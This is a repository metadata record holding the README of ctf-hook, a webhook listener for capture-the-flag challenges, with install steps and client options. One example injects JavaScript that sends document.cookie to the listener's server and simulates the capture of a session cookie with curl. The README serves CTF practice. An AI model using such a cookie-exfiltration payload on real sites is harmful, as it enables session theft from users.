{"id":17767153,"url":"https://github.com/prillan/ctf-hook","last_synced_at":"2025-04-01T14:48:44.808Z","repository":{"id":146191596,"uuid":"359132664","full_name":"Prillan/ctf-hook","owner":"Prillan","description":null,"archived":false,"fork":false,"pushed_at":"2023-11-26T08:41:35.000Z","size":66,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":3,"default_branch":"master","last_synced_at":"2025-02-07T09:33:03.425Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Haskell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Prillan.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-04-18T12:07:24.000Z","updated_at":"2023-11-26T08:41:39.000Z","dependencies_parsed_at":null,"dependency_job_id":"f3767f70-146d-4bf5-9d13-6eef64c95686","html_url":"https://github.com/Prillan/ctf-hook","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Prillan%2Fctf-hook","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Prillan%2Fctf-hook/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Prillan%2Fctf-hook/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Prillan%2Fctf-hook/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Prillan","download_url":"https://codeload.github.com/Prillan/ctf-hook/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246659938,"owners_count":20813333,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-10-26T20:42:58.296Z","updated_at":"2025-04-01T14:48:44.784Z","avatar_url":"https://github.com/Prillan.png","language":"Haskell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CTF Webhook Listener\n\nTODO\n\n## Installing\n\n### The Client with Pip\n\nRequires at least Python 3.8.\n\n```\n$ pip install 'git+https://github.com/Prillan/ctf-hook#subdirectory=ctf-hook-client'\n```\nor clone and run\n```\n$ pip3.8 install --user ./ctf-hook-client\n```\n\n### The Client with Nix\n\nInstall by running\n```\n$ nix-env -f default.nix -i ctf-hook-client\ninstalling 'ctf-hook-client-0.1.0'\nbuilding '/nix/store/yr0w1szrmzgw66sm93frzi5zmgsvqa1b-user-environment.drv'...\ncreated 680 symlinks in user environment\n$ ctf-hook --help\nusage: ctf-hook [-h] [--verbose] [--quiet] [--reuse-subdomain] [--config-file CONFIG_FILE] [--serve PATH]\n                [--serve-file FILE] [--json] [--path] [--strip] [--urldecode] [--base64]\n\noptional arguments:\n  -h, --help            show this help message and exit\n\nGeneral options:\n  --verbose, -v         Show debug information.\n  --quiet, -q           Silence log output.\n  --reuse-subdomain, -rs\n                        Reuse the last used subdomain.\n  --config-file CONFIG_FILE\n                        Load config from CONFIG_FILE.\n\nServing files/directories:\n  --serve PATH          Serves the whole directory structure if PATH is a directory, rooted at / on the server. Sets\n                        the default server response if PATH is a file.\n  --serve-file FILE, -sf FILE\n                        Serves FILE at /FILE on the server. (Can be repeated multiple times)\n\nOutputting:\n  --json, -j            Output each request interpreted as a json payload.\n  --path, -p            Only output the path of each request.\n  --strip               Strips output of irrelevant parts. Currently only removes leading / from --path output.\n  --urldecode           Url decode/unquote data before outputting it. Works with --path. Applies after --strip.\n  --base64, -b64        Base64 decode data before outputting it. Works with --path. Applies after --urldecode.\n```\n\n### The Server with Nix\n\nBuild the server with\n```\n$ nix-build -A server\n...\n/nix/store/0cbk2ng2bcwlygpf4hfwhiykwipgs2x4-ctf-hook-0.1.0.0\n$ ls result/bin\nctf-hook-server\n```\n\n## The Client\n\n```\n$ ctf-hook --help\nusage: ctf-hook [-h] [--verbose] [--quiet] [--reuse-subdomain] [--config-file CONFIG_FILE] [--serve PATH]\n                [--serve-file FILE] [--json] [--path] [--strip] [--urldecode] [--base64]\n\noptional arguments:\n  -h, --help            show this help message and exit\n\nGeneral options:\n  --verbose, -v         Show debug information.\n  --quiet, -q           Silence log output.\n  --reuse-subdomain, -rs\n                        Reuse the last used subdomain.\n  --config-file CONFIG_FILE\n                        Load config from CONFIG_FILE.\n\nServing files/directories:\n  --serve PATH          Serves the whole directory structure if PATH is a directory, rooted at / on the server. Sets\n                        the default server response if PATH is a file.\n  --serve-file FILE, -sf FILE\n                        Serves FILE at /FILE on the server. (Can be repeated multiple times)\n\nOutputting:\n  --json, -j            Output each request interpreted as a json payload.\n  --path, -p            Only output the path of each request.\n  --strip               Strips output of irrelevant parts. Currently only removes leading / from --path output.\n  --urldecode           Url decode/unquote data before outputting it. Works with --path. Applies after --strip.\n  --base64, -b64        Base64 decode data before outputting it. Works with --path. Applies after --urldecode.\n```\n\n### Examples\n\n#### XSS Exfiltration\n\nSay we have the following JS snippet.\n```\ntag.innerHTML = \"\u003cimg src=\\\" + url + \"\\\" /\u003e\"\n```\n\nLet's grab the cookies.\n\n```\ntag.innerHTML = \"\u003cimg src=\\\"\" + server + \"/\" + escape(document.cookie) + \"\\\" /\u003e\"\n```\n\nSet up our client:\n```\n$ ctf-hook --path --urldecode\n[2021-04-14 22:03:37,505]: INFO - Using domain 54bwvatlje.127.0.0.1.nip.io\n[2021-04-14 22:03:37,505]: INFO -    Try a query: curl 54bwvatlje.127.0.0.1.nip.io/flag-xxyy\n```\n\nTrigger the XSS (simulated by using curl here)\n```\n$ curl '54bwvatlje.127.0.0.1.nip.io/admin%3D1%3B%20sessionId%3Ddeadbeef%3B'\ndata stored for subdomain 54bwvatlje!\n```\n\nBack to our client output:\n```\n/admin=1; sessionId=deadbeef;\n```\n\nSuccess!\n\n#### Serving Images\n\n```\n$ ctf-hook --serve pwn.jpg\n[2018-12-31 21:07:14,582]: INFO - Using subdomain 54bwvatlje.127.0.0.1.nip.io\n[2018-12-31 21:07:14,599]: INFO - pwn.jpg uploaded to *\n```\n\n```\n$ curl -s 54bwvatlje.127.0.0.1.nip.io:8080 | xxd | head -n 1\n00000000: ffd8 ffe0 0010 4a46 4946 0001 0101 012c  ......JFIF.....,\n```\n\nor\n\n```\n$ ctf-hook --serve-file pwn.jpg\n[2018-12-31 21:07:55,338]: INFO - Using subdomain 54bwvatlje.127.0.0.1.nip.io\n[2018-12-31 21:07:55,369]: INFO - pwn.jpg uploaded to pwn.jpg\n```\n\n```\n$ curl -s 54bwvatlje.127.0.0.1.nip.io:8080/pwn.jpg | xxd | head -n 1\n00000000: ffd8 ffe0 0010 4a46 4946 0001 0101 012c  ......JFIF.....,\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprillan%2Fctf-hook","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fprillan%2Fctf-hook","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fprillan%2Fctf-hook/lists"}